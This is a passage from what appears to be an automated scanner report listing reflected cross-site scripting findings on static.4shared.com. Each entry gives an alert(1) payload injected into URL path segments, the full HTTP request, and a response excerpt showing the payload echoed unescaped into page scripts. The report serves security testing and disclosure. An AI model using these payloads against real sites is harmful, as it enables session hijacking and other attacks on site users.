function(){
showLoginBox();
}
);
}else{
showLo
...[SNIP]...

1.51. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/js/1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ccb7"-alert(1)-"03ea243a2a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles9ccb7"-alert(1)-"03ea243a2a2/js/1258691160/bundles/js/global.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles9ccb7"-alert(1)-"03ea243a2a2/js/1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E38EA5308504D5C33D6DD7767A3BD57.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:31 GMT
Content-Length: 36305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles9ccb7"-alert(1)-"03ea243a2a2/js/1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

1.52. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/js/1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7651c'-alert(1)-'a227967936 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/js7651c'-alert(1)-'a227967936/1258691160/bundles/js/global.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/js7651c'-alert(1)-'a227967936/1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1020D6768B1217F5D9D631D15D645D4C.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:37 GMT
Content-Length: 36300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles/js7651c'-alert(1)-'a227967936/1258691160/bundles/js/global.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLogin
...[SNIP]...

1.53. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/js/1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4da92"-alert(1)-"7b78290c6f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/js4da92"-alert(1)-"7b78290c6f9/1258691160/bundles/js/global.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/js4da92"-alert(1)-"7b78290c6f9/1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C39C846DD17D85C176855BA695E2C4C8.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:36 GMT
Content-Length: 36305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/js4da92"-alert(1)-"7b78290c6f9/1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
func
...[SNIP]...

1.54. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/js/gzip_1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1d5c'-alert(1)-'7042127641b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundlesc1d5c'-alert(1)-'7042127641b/js/gzip_1258691160/bundles/js/global.js HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundlesc1d5c'-alert(1)-'7042127641b/js/gzip_1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0760D31F139EEBB3A0CB6527105261A2.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:07 GMT
Content-Length: 36349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundlesc1d5c'-alert(1)-'7042127641b/js/gzip_1258691160/bundles/js/global.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
s
...[SNIP]...

1.55. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/js/gzip_1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb4d2"-alert(1)-"5f2a71056a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundlesbb4d2"-alert(1)-"5f2a71056a9/js/gzip_1258691160/bundles/js/global.js HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundlesbb4d2"-alert(1)-"5f2a71056a9/js/gzip_1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FD429EE8057B85C86EB3CF8CBFD9A936.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:06 GMT
Content-Length: 36338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundlesbb4d2"-alert(1)-"5f2a71056a9/js/gzip_1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.56. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/js/gzip_1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83dc7"-alert(1)-"5295142c7b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/js83dc7"-alert(1)-"5295142c7b1/gzip_1258691160/bundles/js/global.js HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/js83dc7"-alert(1)-"5295142c7b1/gzip_1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AB763FE317659EF84EDC6A27F3F97ABD.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:10 GMT
Content-Length: 36349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/js83dc7"-alert(1)-"5295142c7b1/gzip_1258691160/bundles/js/global.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.57. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/js/gzip_1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ad35'-alert(1)-'b223837683e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/js2ad35'-alert(1)-'b223837683e/gzip_1258691160/bundles/js/global.js HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/js2ad35'-alert(1)-'b223837683e/gzip_1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B5186A68787F0AA3E57371915677E696.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:11 GMT
Content-Length: 36338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles/js2ad35'-alert(1)-'b223837683e/gzip_1258691160/bundles/js/global.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
show
...[SNIP]...

1.58. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/4shFeatures.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7b46'-alert(1)-'aebbb7ae38b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa7b46'-alert(1)-'aebbb7ae38b/4shFeatures.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssa7b46'-alert(1)-'aebbb7ae38b/4shFeatures.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=50F5A536FA306BEA6A8546AA6038EB23.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:16 GMT
Content-Length: 36190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/cssa7b46'-alert(1)-'aebbb7ae38b/4shFeatures.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}
...[SNIP]...

1.59. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/4shFeatures.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a532a"-alert(1)-"56c404f6318 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa532a"-alert(1)-"56c404f6318/4shFeatures.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssa532a"-alert(1)-"56c404f6318/4shFeatures.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BEF9E6303AEEAD94CE76A913B1A2F00C.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:15 GMT
Content-Length: 36190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssa532a"-alert(1)-"56c404f6318/4shFeatures.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.60. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/4shFeatures.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf1b"-alert(1)-"8d2f34b5bc1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/4shFeatures.cssfaf1b"-alert(1)-"8d2f34b5bc1?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/4shFeatures.cssfaf1b"-alert(1)-"8d2f34b5bc1
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C45CCF983AA74A4AF3418259238DAC27.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:19 GMT
Content-Length: 36190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/4shFeatures.cssfaf1b"-alert(1)-"8d2f34b5bc1";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.61. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/4shFeatures.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff951'-alert(1)-'7d092c55ba9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/4shFeatures.cssff951'-alert(1)-'7d092c55ba9?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/4shFeatures.cssff951'-alert(1)-'7d092c55ba9
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2A611CB380AE2962DDD8D3F461818DD6.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:20 GMT
Content-Length: 36190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
x == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/4shFeatures.cssff951'-alert(1)-'7d092c55ba9',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.62. http://static.4shared.com/css/common.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 498ae"-alert(1)-"582fd7f25e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css498ae"-alert(1)-"582fd7f25e7/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css498ae"-alert(1)-"582fd7f25e7/common.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=902A375A6F87ECE1509A04F2E46DBA86.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:24 GMT
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css498ae"-alert(1)-"582fd7f25e7/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.63. http://static.4shared.com/css/common.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b66e2'-alert(1)-'0942be89c25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssb66e2'-alert(1)-'0942be89c25/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssb66e2'-alert(1)-'0942be89c25/common.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=469731B762E1F11DCB59C30AB83F309F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:26 GMT
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/cssb66e2'-alert(1)-'0942be89c25/common.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

f
...[SNIP]...

1.64. http://static.4shared.com/css/common.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddd86"-alert(1)-"e7244271d61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/common.cssddd86"-alert(1)-"e7244271d61 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/common.cssddd86"-alert(1)-"e7244271d61
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E72E8FA400055E4F31C2D8E5BECF0112.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:30 GMT
Content-Length: 36165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/common.cssddd86"-alert(1)-"e7244271d61";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.65. http://static.4shared.com/css/common.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7449'-alert(1)-'14cd57d5cfc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/common.cssf7449'-alert(1)-'14cd57d5cfc HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/common.cssf7449'-alert(1)-'14cd57d5cfc
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B83B1F396CF9D075321C42D55630D88A.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:31 GMT
Content-Length: 36154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/css/common.cssf7449'-alert(1)-'14cd57d5cfc',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.66. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/css/coolbuttons.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658a0"-alert(1)-"488f25f19da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css658a0"-alert(1)-"488f25f19da/coolbuttons.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
